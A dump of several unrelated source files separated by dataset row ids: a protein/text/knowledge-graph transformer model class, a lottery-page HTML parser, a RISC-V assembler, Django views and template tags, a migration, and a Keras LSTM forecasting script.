        self.entity_bias = nn.Parameter(torch.zeros(config.kg_vocab_size))
        self.prot_bias = nn.Parameter(torch.zeros(config.prot_vocab_size))
        # Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
        self.decoder.text_bias = self.text_bias
        self.decoder.entity_bias = self.entity_bias
        self.decoder.prot_bias = self.prot_bias

    def forward(self, hidden_states):
        """Map hidden states to values for the text (1st part), kg (2nd part) and protein vocabs (3rd part).

        The slicing below assumes the sequence dimension (dim 1) is laid out as
        [text | KG | protein] — that layout is produced by
        ProtSTonKGsForPreTraining.forward.

        :param hidden_states: encoder output; sliced along dim 1, so it is
            assumed to be (batch, seq_len, hidden_size) — TODO confirm.
        :return: triple of (text, entity, protein) logits for the three parts.
        """
        # Common transformations (dense layer, layer norm + activation function) performed on text, KG and protein data
        # transform is initialized in the parent BigBirdLMPredictionHead class
        hidden_states = self.transform(hidden_states)
        # The first part is processed with the text decoder, the second with the entity decoder, and the third with the
        # protein decoder to map to the text, kg, and protein vocab size, respectively
        text_hidden_states_to_vocab = self.text_decoder(hidden_states[:, : self.kg_start_idx])
        ent_hidden_states_to_kg_vocab = self.entity_decoder(
            hidden_states[:, self.kg_start_idx : self.prot_start_idx]
        )
        prot_hidden_states_to_prot_vocab = self.prot_decoder(
            hidden_states[:, self.prot_start_idx :]
        )
        return (
            text_hidden_states_to_vocab,
            ent_hidden_states_to_kg_vocab,
            prot_hidden_states_to_prot_vocab,
        )
class ProtSTonKGsForPreTraining(BigBirdForPreTraining):
    """Pre-training part of the ProtSTonKGs model, based on text, KG and protein sequence embeddings."""

    def __init__(
        self,
        config,  # the config is loaded from scratch later on anyways
        protstonkgs_model_type: str = PROTSTONKGS_MODEL_TYPE,
        lm_model_type: str = NLP_MODEL_TYPE,
        lm_vocab_size: int = 28996,
        prot_start_idx: int = 1024,
        prot_model_type: str = PROT_SEQ_MODEL_TYPE,
        prot_vocab_size: int = 30,
        kg_start_idx: int = 768,
        kg_embedding_dict_path: str = PROT_EMBEDDINGS_PATH,
    ):
        """Initialize the model architecture components of ProtSTonKGs.

        The Transformer operates on a concatenation of [text, KG, protein]-based input sequences.

        :param config: Required for automated methods such as .from_pretrained in classes that inherit from this one.
            NOTE(review): the incoming value is discarded and rebuilt below from protstonkgs_model_type.
        :param protstonkgs_model_type: The type of Transformer used to construct ProtSTonKGs.
        :param lm_model_type: The type of (hf) model used to generate the initial text embeddings.
        :param lm_vocab_size: Vocabulary size of the language model backbone.
        :param kg_start_idx: The index at which the KG random walks start (and the text ends).
        :param kg_embedding_dict_path: The path specification for the node2vec embeddings used for the KG data.
        :param prot_start_idx: The index at which the protein sequences start (and the KG part ends).
        :param prot_model_type: The type of (hf) model used to generate the initial protein sequence embeddings.
        :param prot_vocab_size: Vocabulary size of the protein backbone.
        """
        # Initialize the KG dict from the file here, rather than passing it as a parameter, so that it can
        # be loaded from a checkpoint
        kg_embedding_dict = prepare_df(kg_embedding_dict_path)
        # Initialize the BigBird config for the model architecture
        config = BigBirdConfig.from_pretrained(protstonkgs_model_type)
        # Use gradient checkpointing to save memory at the expense of speed
        config.update({"gradient_checkpointing": True})
        # Add the text vocabulary size to the default config of a standard BigBird model
        config.update({"lm_vocab_size": lm_vocab_size})
        # Add the number of KG entities to the default config of a standard BigBird model
        config.update({"kg_vocab_size": len(kg_embedding_dict)})
        # Add the protein sequence vocabulary size to the default config as well
        config.update({"prot_vocab_size": prot_vocab_size})
        # Initialize the underlying BigBirdForPreTraining model that will be used to build the
        # ProtSTonKGs Transformer layers
        super().__init__(config)
        # Initialize the three backbones for generating the initial embeddings for the three modalities (text, KG, prot)
        # 1. LM backbone for text (pre-trained BERT-based model to get the initial embeddings)
        # based on the specified protstonkgs_model_type (e.g. BioBERT)
        self.lm_backbone = BertModel.from_pretrained(lm_model_type)
        # 2. Prot backbone for protein sequences (e.g. ProtBERT)
        # do_lower_case is required, see example in https://huggingface.co/Rostlab/prot_bert
        self.prot_backbone = BertModel.from_pretrained(prot_model_type)
        self.prot_start_idx = prot_start_idx
        # Initialize the ProtSTonKGs tokenizer
        self.protstonkgs_tokenizer = BigBirdTokenizer.from_pretrained(protstonkgs_model_type)
        # In order to initialize the KG backbone: First get the separator, mask and unknown token ids from the
        # ProtSTonKGs model base (BigBird)
        self.sep_id = self.protstonkgs_tokenizer.sep_token_id
        self.mask_id = self.protstonkgs_tokenizer.mask_token_id
        self.unk_id = self.protstonkgs_tokenizer.unk_token_id
        # 3. KG backbone for KG entities (pretrained node2vec model)
        # Get numeric indices for the KG embedding vectors except for the sep, unk, mask ids which are reserved for the
        # LM [SEP] embedding vectors (see below)
        numeric_indices = list(range(len(kg_embedding_dict) + 3))
        # Keep the numeric indices of the special tokens free, don't put the kg embeds there
        for special_token_id in [self.sep_id, self.mask_id, self.unk_id]:
            numeric_indices.remove(special_token_id)
        # Generate numeric indices for the KG node names (iterating .keys() is deterministic)
        self.kg_idx_to_name = {i: key for i, key in zip(numeric_indices, kg_embedding_dict.keys())}
        # Initialize KG index to embeddings based on the provided kg_embedding_dict
        # NOTE(review): this is a plain dict of tensors, not an nn.Module, so
        # these embeddings are not registered as parameters/buffers.
        self.kg_backbone = {
            i: torch.tensor(kg_embedding_dict[self.kg_idx_to_name[i]]).to(self.lm_backbone.device)
            for i in self.kg_idx_to_name.keys()
        }
        self.kg_start_idx = kg_start_idx
        # Add the MASK, SEP and UNK (LM backbone) embedding vectors to the KG backbone so that the labels are correctly
        # identified in the loss function later on
        # [0][0][0] is required to get the shape from batch x seq_len x hidden_size to hidden_size
        with torch.no_grad():
            for special_token_id in [self.sep_id, self.mask_id, self.unk_id]:
                self.kg_backbone[special_token_id] = self.lm_backbone(
                    torch.tensor([[special_token_id]]).to(self.device),
                )[0][0][0]
        # Override the standard MLM head: In the underlying BigBirdForPreTraining model, change the MLM head to a
        # custom ProtSTonKGsPELMPredictionHead so that it can be used on the concatenated text/entity/prot sequence input
        self.cls.predictions = ProtSTonKGsPELMPredictionHead(
            config,
            kg_start_idx=kg_start_idx,
            prot_start_idx=prot_start_idx,
        )
        # Freeze the parameters of the LM and Prot backbones so that they're not updated during training
        # (We only want to train the ProtSTonKGs Transformer layers + prot to hidden linear layer)
        for backbone in [self.lm_backbone, self.prot_backbone]:
            for param in backbone.parameters():
                param.requires_grad = False
        # Add another layer that transforms the hidden size of the protein model onto the ProtSTonKGs hidden size
        self.prot_to_lm_hidden_linear = nn.Linear(
            self.prot_backbone.config.hidden_size,
            self.config.hidden_size,
        )

    @classmethod
    @lru_cache(maxsize=32)
    # NOTE(review): lru_cache on a classmethod keeps returned models alive for
    # the lifetime of the cache — intentional here to avoid reloading weights.
    def from_default_pretrained(cls, **kwargs) -> ProtSTonKGsForPreTraining:
        """Get the default pre-trained STonKGs model."""
        return cls.from_pretrained("stonkgs/protstonkgs", **kwargs)

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        masked_lm_labels=None,
        ent_masked_lm_labels=None,
        prot_masked_lm_labels=None,
        return_dict=None,
        head_mask=None,
    ):
        """Perform one forward pass for a given sequence of text_input_ids + ent_input_ids + prot_input_ids.

        Due to having more than two parts (and a RoBERTa base in the default BigBird model), the NSP objective is
        omitted in this forward function.

        :param input_ids: Concatenation of text + KG (random walk) + protein sequence ids,
            split at kg_start_idx and prot_start_idx
        :param attention_mask: Attention mask of the combined input sequence
        :param token_type_ids: Token type IDs of the combined input sequence (unused here)
        :param masked_lm_labels: Masked LM labels for only the text part
        :param ent_masked_lm_labels: Masked entity labels for only the KG part
        :param prot_masked_lm_labels: Masked protein labels for only the protein part
        :param return_dict: Whether the output should be returned as a dict or not
        :param head_mask: Used to cancel out certain heads in the Transformer (unused here)
        :return: Loss, prediction_logits in a BigBirdForPreTrainingOutputWithPooling format
        """
        # No backpropagation is needed for getting the initial embeddings from the backbones
        with torch.no_grad():
            # 1. Use the LM backbone to get the pre-trained token embeddings
            # batch x number_text_tokens x hidden_size
            # The first element of the returned tuple from the LM backbone forward() pass is the sequence of hidden
            # states. The text part is fed through in three equal chunks
            # (kg_start_idx is assumed divisible by 3 — TODO confirm).
            text_embeddings = torch.cat(
                [
                    self.lm_backbone(
                        input_ids[
                            :, i * (self.kg_start_idx // 3) : (i + 1) * (self.kg_start_idx // 3)
                        ]
                    )[0]
                    for i in range(3)
                ],
                dim=1,
            )
            # 2. Use the KG backbone to obtain the pre-trained entity embeddings
            # batch x number_kg_tokens x hidden_size
            ent_embeddings = torch.stack(
                [
                    # for each numeric index in the random walks sequence: get the embedding vector from the KG backbone
                    torch.stack([self.kg_backbone[i.item()] for i in j])
                    # for each example in the batch: get the random walks sequence
                    for j in input_ids[:, self.kg_start_idx : self.prot_start_idx]
                ],
            )
            # 3. Use the Prot backbone to obtain the pre-trained entity embeddings
            # batch x number_prot_tokens x prot_hidden_size (prot_hidden_size != hidden_size)
            prot_embeddings_original_dim = self.prot_backbone(input_ids[:, self.prot_start_idx :])[
                0
            ]
        # Additional layer to project prot_hidden_size onto hidden_size
        prot_embeddings = self.prot_to_lm_hidden_linear(prot_embeddings_original_dim)
        # Concatenate token, KG and prot embeddings obtained from the LM, KG and prot backbones and cast to float
        # batch x seq_len x hidden_size
        inputs_embeds = (
            torch.cat(
                [
                    text_embeddings,
                    ent_embeddings.to(text_embeddings.device),
                    prot_embeddings.to(text_embeddings.device),
                ],
                dim=1,
            )
            .type(torch.FloatTensor)
            .to(self.device)
        )
        # Get the hidden states from the basic ProtSTonKGs Transformer layers
        # batch x seq_len x hidden_size
        outputs = self.bert(
            inputs_embeds=inputs_embeds,
            attention_mask=attention_mask,
            return_dict=None,
        )
        # batch x seq_len x hidden_size
        # sequence_output, pooled_output = outputs.last_hidden_state, outputs.pooler_output
        sequence_output, pooled_output = outputs[:2]
        # Generate the prediction scores (mapping to text and entity vocab sizes + NSP) for the training objectives
        # prediction_scores = Text MLM, entity "MLM" and protein "MLM" scores
        # NOTE(review): self.cls is inherited from BigBirdForPreTraining; its
        # predictions head was replaced by ProtSTonKGsPELMPredictionHead above.
        prediction_scores, _ = self.cls(sequence_output, pooled_output)
        # The custom PELM prediction head returns a triple of prediction scores for tokens, entities,
        # and protein sequences, respectively
        (
            token_prediction_scores,
            entity_predictions_scores,
            prot_predictions_scores,
        ) = prediction_scores
        # Calculate the loss only when all three label tensors are provided
        total_loss = None
        if (
            masked_lm_labels is not None
            and ent_masked_lm_labels is not None
            and prot_masked_lm_labels is not None
        ):
            loss_fct = nn.CrossEntropyLoss()
            # 1. Text-based MLM
            masked_lm_loss = loss_fct(
                token_prediction_scores.view(-1, self.config.lm_vocab_size),
                masked_lm_labels.view(-1),
            )
            # 2. Entity-based masked "language" (entity) modeling
            ent_masked_lm_loss = loss_fct(
                entity_predictions_scores.view(-1, self.config.kg_vocab_size),
                ent_masked_lm_labels.view(-1),
            )
            # 3. Protein-based masked "language" (entity) modeling
            prot_masked_lm_loss = loss_fct(
                prot_predictions_scores.view(-1, self.config.prot_vocab_size),
                prot_masked_lm_labels.view(-1),
            )
            # Total loss = the sum of the individual training objective losses
            total_loss = masked_lm_loss + ent_masked_lm_loss + prot_masked_lm_loss
        if not return_dict:
            output = prediction_scores + outputs[2:]
            return ((total_loss,) + output) if total_loss is not None else output
        return BigBirdForPreTrainingOutputWithPooling(
            loss=total_loss,
            prediction_logits=prediction_scores,
            hidden_states=sequence_output,
            attentions=outputs.attentions,
            pooler_output=pooled_output,
        )
|
996,836 | 0043280a430bdf989b4a829aeea0d46d670b35bc | #-*- coding: utf-8 -*-
#https://habrahabr.ru/post/280238/
#http://www.stoloto.ru/ruslotto/game
#-*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import sys
#import lxml
#import requests
#try:
#f=open('/home/user/work/parsers/lot/raw4.html','r')
#f=open('raw3.html','r', encoding='utf-8')
# Parse the saved lottery page and append every <tr class="numbers"> row to 120.txt.
# Bug fix: the input file handle was never closed.
with open('raw4.html', 'r') as f:
    s = f.read()
soup = BeautifulSoup(s, 'html.parser')
tr_class = soup.find('tr', {'class': 'numbers'}).select("td")
var = soup.title
ss = soup.find_all('tr', {'class': 'numbers'})  # ss is a list of all strings with numbers (20 tickets with 6 strings=120)
print('\n')
print('first element in list')
print(ss[0])
print('\n')
print('ss type is')
print(type(ss))
# Bug fix: `print len(ss)` was a Python 2 print statement — a SyntaxError on
# Python 3, which the rest of this script targets.
print(len(ss))
print(ss[1])
print('\n')
print('soup.title.string: ')
print(soup.title.string)
print('\n')
print("var.encode('utf-8')")
print(var.encode('utf-8'))
print('\n')
print('trying to open output_file')
# Bug fix: use a context manager so the output file is closed even if a
# write raises.
with open('120.txt', 'a') as output_file:
    for i in range(len(ss)):
        print(ss[i])
        output_file.write(str(ss[i]))
        output_file.write('\n')
print('Writing complete')
#tr_class = soup.find_next('tr',{'class': 'numbers'})#.select("td")
'''
res=[]
for item in tr_class:
x=str(item)[4:-5]
if x!='': res.append(x)
print('res type: ',res,'\n') #это список спарсеных значений
print('res type: ',type(res),'\n')
##Тут мы запоняем словарь ключами 1-90 и нулевыми значениями
my_dict={}
my_dict.items
keys=[]
for i in range(1,91):
keys.append(i)
my_dict[keys[i-1]]=0
#print(my_dict)
#Тут мы деламе другую херню
for j in res:
j=int(j)
my_dict[j]=my_dict.get(j)+1
print(my_dict)
'''
|
996,837 | 0b977a4dc33c23f2edec69fd3b8277022bb7436e | a = [1,3,4,5]
# list.index returns the position of the first matching element (here 1);
# a[1:] is a new list holding everything after the first element.
print(a.index(3))
print(a[1:])
# def maxSubArray(nums):
# f = [nums[0]]
# for i in range(1, len(nums)):
# f.append(max((f[-1]+nums[i]), nums[i]))
# print(f)
# return max(f)
# maxSubArray(a) |
996,838 | 2ef516b223f7dc502ee78a21a33bbc7455e0dd50 | num_string = input('Input number: ')
# Echo the entered text parsed as an int, then as a float.
# NOTE(review): int() on a non-integer string such as "3.5" raises ValueError.
print(int(num_string))
print(float(num_string))
|
996,839 | dfd120591734b9e834c681a74212c13d1423d21c | r_type = {}
# R-type ALU instructions: opcode / funct3 / funct7 bit strings.
r_type = {
    "add": {"opcode": "0110011", "funct3": "000", "funct7": "0000000"},
    "sll": {"opcode": "0110011", "funct3": "001", "funct7": "0000000"},
    "srl": {"opcode": "0110011", "funct3": "101", "funct7": "0000000"},
    "xor": {"opcode": "0110011", "funct3": "100", "funct7": "0000000"},
    "mul": {"opcode": "0110011", "funct3": "000", "funct7": "0000001"},
}

# I-type (immediate) instructions: opcode / funct3.
i_type = {
    "addi": {"opcode": "0010011", "funct3": "000"},
    "slli": {"opcode": "0010011", "funct3": "001"},
    "srli": {"opcode": "0010011", "funct3": "101"},
    "ori": {"opcode": "0010011", "funct3": "110"},
    "andi": {"opcode": "0010011", "funct3": "111"},
}

# B-type (branch) instructions: opcode / funct3.
b_type = {
    "beq": {"opcode": "1100011", "funct3": "000"},
    "bne": {"opcode": "1100011", "funct3": "001"},
}

# Register name -> number: ABI names (note s0 and fp both alias x8),
# then the raw x0..x31 aliases generated in a loop.
registers = {
    "zero": 0, "ra": 1, "sp": 2, "gp": 3, "tp": 4,
    "t0": 5, "t1": 6, "t2": 7,
    "s0": 8, "fp": 8, "s1": 9,
    "a0": 10, "a1": 11, "a2": 12, "a3": 13,
    "a4": 14, "a5": 15, "a6": 16, "a7": 17,
    "s2": 18, "s3": 19, "s4": 20, "s5": 21, "s6": 22,
    "s7": 23, "s8": 24, "s9": 25, "s10": 26, "s11": 27,
    "t3": 28, "t4": 29, "t5": 30, "t6": 31,
}
for _num in range(32):
    registers["x" + str(_num)] = _num
def padZeros(binStr, size):
    """Left-pad `binStr` with '0' characters up to at least `size` characters."""
    return binStr.rjust(size, "0")
def getBinFromBase10(register):
    """Return the named register's number as an unpadded binary string (e.g. 'a0' -> '1010')."""
    return format(registers[register], "b")
def getMachineCode(statement):
    """Translate one assembly statement into a 32-bit hex machine-code string.

    Supports the R-, I- and B-type instructions declared in the tables above.
    A leading label ("loop: add ...") is stripped before decoding. Returns a
    string of the form '0x00000000'-'0xffffffff'; an unknown mnemonic yields
    '0x00000000'.
    """
    # Bug fix: str.find returns -1 (which is truthy!) when ':' is absent, so
    # the original `if statement.find(":")` took the label-stripping branch
    # for label-less lines and skipped it when a label started at column 0.
    if statement.find(":") != -1:
        statement = statement[statement.find(":") + 1:].strip()
    command = statement[: statement.find(" ")]
    regs = statement[statement.find(" "):].split(",")
    for i in range(len(regs)):
        regs[i] = regs[i].strip()
    machine_code = ""
    if command in r_type:
        # Encoding: funct7 | rs2 | rs1 | funct3 | rd | opcode
        f7 = r_type[command]["funct7"]
        rs2 = padZeros(getBinFromBase10(regs[2]), 5)
        rs1 = padZeros(getBinFromBase10(regs[1]), 5)
        rd = padZeros(getBinFromBase10(regs[0]), 5)
        f3 = r_type[command]["funct3"]
        opcode = r_type[command]["opcode"]
        machine_code = hex(int(f7 + rs2 + rs1 + f3 + rd + opcode, 2))
    elif command in i_type:
        # Encoding: imm[11:0] | rs1 | funct3 | rd | opcode
        # Masking with 0xFFF keeps the 12-bit two's-complement form of a
        # negative immediate.
        immd = padZeros(bin(int(regs[2]) & 0b111111111111).replace("0b", ""), 12)
        rs1 = padZeros(getBinFromBase10(regs[1]), 5)
        f3 = i_type[command]["funct3"]
        rd = padZeros(getBinFromBase10(regs[0]), 5)
        opcode = i_type[command]["opcode"]
        machine_code = hex(int(immd + rs1 + f3 + rd + opcode, 2))
    elif command in b_type:
        # Encoding: imm[12|10:5] | rs2 | rs1 | funct3 | imm[4:1|11] | opcode
        # (the 13-bit branch offset is scattered per the RISC-V B format).
        immd = padZeros(bin(int(regs[2]) & 0b1111111111111).replace("0b", ""), 13)
        rs2 = padZeros(getBinFromBase10(regs[1]), 5)
        rs1 = padZeros(getBinFromBase10(regs[0]), 5)
        f3 = b_type[command]["funct3"]
        opcode = b_type[command]["opcode"]
        machine_code = hex(
            int(immd[0] + immd[2:8] + rs2 + rs1 + f3 + immd[8:12] + immd[1] + opcode, 2)
        )
    # Normalize to a fixed-width, zero-padded '0x'-prefixed 8-hex-digit string.
    machine_code = padZeros(str(machine_code)[2:], 8)
    machine_code = "0x" + machine_code
    return machine_code
if __name__ == "__main__":
    # Assemble each line of the test program and print the resulting hex word.
    with open("test_code.s", "r") as f:
        for statement in f:
            print(getMachineCode(statement))
|
996,840 | a8f8b931c2b2bf87b51dff4e099a69ead98f3637 | default_app_config = 'algorithm.apps.AlgorithmConfig'
|
996,841 | 343d30726daac5e552a2de410c7e6f65ae352e51 | #for extracting specific content from tsv files
import csv
#cols is a list of numbers which specify which columns should be extracted
def extractColumns(path, cols, name):
    """Copy selected columns from one TSV file into a new TSV file.

    :param path: source TSV file
    :param cols: zero-based column indices to keep, in desired output order
    :param name: destination TSV file (overwritten)
    :raises IndexError: if a row has fewer columns than the largest index in cols
    """
    # Bug fix: newline='' is required so the csv module controls line endings
    # itself; without it the output gets doubled newlines on Windows (csv docs).
    with open(path, 'r', newline='') as tsvin, open(name, 'w', newline='') as t:
        reader = csv.reader(tsvin, delimiter='\t')
        tsvout = csv.writer(t, delimiter='\t')
        for row in reader:
            tsvout.writerow([row[col] for col in cols])
extractColumns('zh-wiki-preprocessed-20180110.tsv', [0,2], 'zh-kanji.tsv') |
996,842 | 9d90940de1cee65dffa97ac35dea54b6b3357aa5 | # -*- coding: utf-8 -*-
#
# This file is part of compono released under the Apache 2 license.
# See the NOTICE for more information.
from django.conf import Settings
from django.conf import settings
from django.template import Library, Node, Template, TemplateSyntaxError
from django.utils.translation import ugettext as _

from mtcompono.models import Page, Type
register = Library()
class ListTypeNode(Node):
    """Template node that renders the list of pages belonging to a named Type.

    The Type is resolved by name; its pages are rendered through the type's own
    'list' template. In DEBUG mode errors are rendered inline; otherwise the
    node renders as an empty string.
    """

    def __init__(self, type_name):
        self.type_name = type_name

    def render(self, context):
        t = Type.by_name(self.type_name)
        if not t:
            if settings.DEBUG:
                return _("[%s n'existe pas]" % self.type_name)
            else:
                return ''
        items = Page.by_type(t._id)
        output = ''
        try:
            tpl = Template(t.templates['list'])
            context.update({"items": items})
            output = tpl.render(context)
        # Bug fix: `except TemplateSyntaxError, e:` is Python 2-only syntax and
        # a SyntaxError on Python 3; the `as` form works on Python 2.6+ and 3.
        except TemplateSyntaxError as e:
            if settings.DEBUG:
                return _("[Erreurs de syntaxe: %s]" % e)
            else:
                return ''
        return output
@register.tag
def list_type(parser, token):
    """`{% list_type <name> %}` — render all pages of the named Type."""
    parts = token.contents.split()
    if len(parts) < 2:
        raise TemplateSyntaxError(_("'list_type' tag nécessite au moins un"
                                    " argument: le nom du type"))
    return ListTypeNode(parts[1])
|
996,843 | 46627acccbff0c29473e2dbcd9c23f93a368ac96 | #!/usr/local/bin/python3
def fib(n):
    """Return the n-th Fibonacci number (fib(0) == 0, fib(1) == 1)."""
    prev, cur = 0, 1
    for _ in range(n):
        prev, cur = cur, prev + cur
    return prev
# Earlier map/lambda experiments kept for reference:
#print(' '.join([str(fib(x)) for x in range(5)]))
#print (list(map(lambda x: fib(int(x))**3, [i for i in range(int(input()))])))
#print (list(map(lambda x: x**3, [fib(i) for i in range(int(input()))])))
# Read a count N from stdin and print the cubes of the first N Fibonacci numbers.
print (list([fib(i)**3 for i in range(int(input()))]))
|
996,844 | 3bc159ca0bf99c9916b53007f87275c80bc63be4 | from django.shortcuts import render, get_object_or_404
from .models import Listing
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from .choices import price_choices, bedroom_choices, state_choices
# Create your views here.
def index(requests):
    """Render all published listings, newest first, six per page."""
    published = Listing.objects.order_by('-list_date').filter(is_published=True)
    paginator = Paginator(published, 6)
    page_number = requests.GET.get('page')
    page = paginator.get_page(page_number)
    return render(requests, 'listings/listings.html', {'listings': page})
def listing(requests, listing_id):
    """Render the detail page for a single listing; 404 if the id is unknown."""
    found = get_object_or_404(Listing, pk=listing_id)
    return render(requests, 'listings/listing.html', {'listing': found})
def search(requests):
    """Filter listings by the optional GET parameters and render the results."""
    results = Listing.objects.order_by('-list_date')
    # (GET parameter, ORM lookup) pairs, applied in the original order;
    # empty/missing values leave the queryset untouched.
    lookups = [
        ('keywords', 'description__icontains'),
        ('city', 'city__iexact'),
        ('state', 'state__iexact'),
        ('bedrooms', 'bedrooms__lte'),
        ('price', 'price__lte'),
    ]
    for param, lookup in lookups:
        if param in requests.GET:
            value = requests.GET[param]
            if value:
                results = results.filter(**{lookup: value})
    context = {
        'state_choices': state_choices,
        'bedroom_choices': bedroom_choices,
        'price_choices': price_choices,
        'listings': results,
        'values': requests.GET,
    }
    return render(requests, 'listings/search.html', context)
|
996,845 | 660c50b826aab7ae0f0456702e4a238ecae59923 | # Generated by Django 2.0.4 on 2020-11-20 19:02
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: renames Tracker.route to lat and adds a
    # matching optional `long` char column (both apparently coordinates —
    # TODO confirm against the Tracker model).

    dependencies = [
        ('core', '0002_auto_20201120_1632'),
    ]

    operations = [
        migrations.RenameField(
            model_name='tracker',
            old_name='route',
            new_name='lat',
        ),
        migrations.AddField(
            model_name='tracker',
            name='long',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
    ]
|
996,846 | 1d08d358e2f1674fa2045e33fce057e15f75a358 | import pandas as pd
from scipy.interpolate import interp1d
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.layers.advanced_activations import LeakyReLU
def sub_Sampler(sample, subSampleLength):
    """Slide a width-`subSampleLength` window over `sample` and stack every
    position into a 2-D numpy array.

    Returns -1 (after printing a message) when the requested window size is
    non-positive or longer than the sample itself.
    """
    if subSampleLength <= 0:
        print("subSampleLength must be greater than or equal to 0")
        return -1
    total = len(sample)
    if subSampleLength > total:
        print("subSampleLength provided was longer than the sample itself")
        return -1
    windows = [sample[start:start + subSampleLength]
               for start in range(total - subSampleLength + 1)]
    return np.array(windows)
def read_Data(sampleLength=120, trainSplit=0.9):
    '''
    read in the data provided in the csv file and
    return train and test data (xTrain, yTrain, xTest, yTest)
    sampleLength controls how long each sample fed to the RNN will be
    trainSplit is a percentage for how much data will be used for training
    '''
    # Bug fix: `sys` is used on the error paths below but was never imported
    # anywhere in this file, so those paths raised NameError instead of exiting.
    import sys
    f = pd.read_csv("passenger-miles-mil-flown-domest.csv")
    # don't need month and year, only need the data to be in the right order.
    # Bug fix: positional-axis drop(...,1) was removed in pandas 2.0;
    # drop(columns=...) is equivalent and works on old pandas too.
    f = f.drop(columns="Month")
    # get all the values for the number of domestic flight miles.
    # Bug fix: DataFrame.as_matrix() was removed in pandas 1.0; plain column
    # selection + .values is equivalent on both old and new pandas.
    Y = f[["Passenger miles (Mil) flown domestic U.K. Jul. ?62-May ?72"]]\
        .values.flatten()
    # set up X axis
    length = len(Y)
    X = np.linspace(0, length - 1, num=length, endpoint=True)
    # set up interpolation function to provide more data to the network
    f = interp1d(X, Y, kind='cubic', copy=False)
    # n is how many steps between each integer
    # for example, setting to 10 produces values [0, 0.1, 0.2, 0.3, 0.4, ...]
    # setting to 2 produces [0, 0.5, 1, 1.5, 2, ...]
    n = 10
    newX = np.linspace(0, length - 1, num=(length * n) - (n - 1), endpoint=True)
    # interpolate
    newY = f(newX)
    # one way of normalizing
    # inX = (newY-np.mean(newY))/np.std(newY)
    # another way of normalizing
    inX = newY / np.max(newY)
    # ensure all samples are of size "sampleLength"
    subSamples = sub_Sampler(inX, sampleLength)
    # error checking for the return of subSamples (-1 signals a size problem)
    if type(subSamples) == int:
        if subSamples == -1:
            sys.exit(1)
    elif subSamples.shape[0] == 0:
        sys.exit(1)
    # split into training data and testing data
    split = int(trainSplit * subSamples.shape[0])
    trainingData = subSamples[:split, :]
    # ensure randomness
    np.random.shuffle(trainingData)
    # yTrain is the last value of each of the samples and xTrain is the series
    # leading up to the last value (which is going to be predicted)
    xTrain = trainingData[:, :-1]
    yTrain = trainingData[:, -1]
    # testing data for evaluating the generalizability of the model
    xTest = subSamples[split:, :-1]
    yTest = subSamples[split:, -1]
    # reshape to (samples, timesteps, 1 feature) as expected by the network
    xTrain = np.reshape(xTrain, (xTrain.shape[0], xTrain.shape[1], 1))
    xTest = np.reshape(xTest, (xTest.shape[0], xTest.shape[1], 1))
    return xTrain, yTrain, xTest, yTest
def RNN(layers=[1,10,10,1], dropoutPercent=0.2, opt="Nadam", lossFunc="mse",
        leakyAlpha=0.3):
    '''
    Build and compile a stacked-LSTM regression model shaped by `layers`.

    layers[0] is the input feature count, layers[1:-1] the LSTM unit counts
    and layers[-1] the size of the final dense output; e.g. [1, 20, 40, 1]
    means 1 input feature, a 20-unit LSTM into a 40-unit LSTM, scalar output.
    dropoutPercent - fraction of units dropped after every LSTM layer
    opt / lossFunc - any optimizer / loss string accepted by Keras
    leakyAlpha - negative-slope coefficient of the closing LeakyReLU
    '''
    model = Sequential()
    # First LSTM needs the input shape; return_sequences keeps the whole
    # sequence so the next stacked LSTM can consume it.
    model.add(LSTM(layers[1],
                   return_sequences=True,
                   input_shape=(None, layers[0])))
    # Dropout after each recurrent layer to help prevent overfitting.
    model.add(Dropout(dropoutPercent))
    # Middle LSTM layers: everything between the first and the last.
    for units in layers[2:-2]:
        model.add(LSTM(units, return_sequences=True))
        model.add(Dropout(dropoutPercent))
    # Final LSTM collapses the sequence into a single vector
    # (return_sequences=False) so a prediction can be made.
    model.add(LSTM(layers[-2], return_sequences=False))
    model.add(Dropout(dropoutPercent))
    # Dense projection followed by LeakyReLU so some gradient signal flows
    # even for negative pre-activations (avoids dead neurons).
    model.add(Dense(layers[-1]))
    model.add(LeakyReLU(alpha=leakyAlpha))
    # Defaults: mean squared error with Nadam (Adam RMSprop + Nesterov momentum).
    model.compile(loss=lossFunc, optimizer=opt)
    return model
def train_Net(xTrain, yTrain, xTest, yTest, model,
              batchSize=500, numEpochs=3000, verbose=1, showStep=10):
    '''
    trains the provided model with the training data and verifies the
    generalizability of the model by graphing the test data versus
    the model's prediction, returns the trained model.
    If verbose is set to 1, then this graph will be displayed every "showStep"
    time steps, if verbose is set to 0, then the graph will only be displayed
    at the end of training
    xTrain, yTrain, xTest, yTest - training and testing data, received from
    read_Data()
    model - model to be trained, built by RNN()
    batchSize - how large each batch should be
    numEpochs - how many time steps the training occurs for
    verbose - controls how much information is displayed
    showStep - controls how often the model's prediction is graphed against the
    actual test data, only occurs if verbose is set to 1
    '''
    def _show_prediction(labels, final):
        # Plot the model's test-set prediction against the true values.
        predicted = model.predict(xTest)
        predicted = np.reshape(predicted, (predicted.size,))
        length = len(predicted)
        x_s = np.linspace(0, length - 1, num=length, endpoint=True)
        plt.clf()
        plt.plot(x_s, predicted, "-", x_s, yTest, "-")
        plt.legend(labels=labels)
        if final:
            plt.show()
        else:
            # non-blocking draw so training can continue
            plt.draw()
            plt.pause(0.0001)

    if verbose == 1:
        for i in range(0, numEpochs, showStep):
            # run "showStep" more training epochs, resuming from epoch i
            model.fit(
                xTrain,
                yTrain,
                validation_split=0.05,
                batch_size=batchSize,  # bug fix: was hard-coded to 512
                epochs=showStep + i,
                initial_epoch=i)
            _show_prediction(["Predicted", "Test data"], final=False)
    else:
        # run all training epochs in one call
        model.fit(
            xTrain,
            yTrain,
            validation_split=0.05,
            batch_size=batchSize,  # bug fix: was hard-coded to 512
            epochs=numEpochs,
            verbose=2)
        _show_prediction(["predicted", "actual"], final=True)
    # return trained model
    return model
# Script entry: build windows of 120 samples, train a two-layer LSTM where
# each hidden layer has as many units as the window length.
sampleLength = 120
xTrain, yTrain, xTest, yTest = read_Data(sampleLength)
model = RNN([1, sampleLength, sampleLength, 1])
trainedModel = train_Net(xTrain, yTrain, xTest, yTest, model)
|
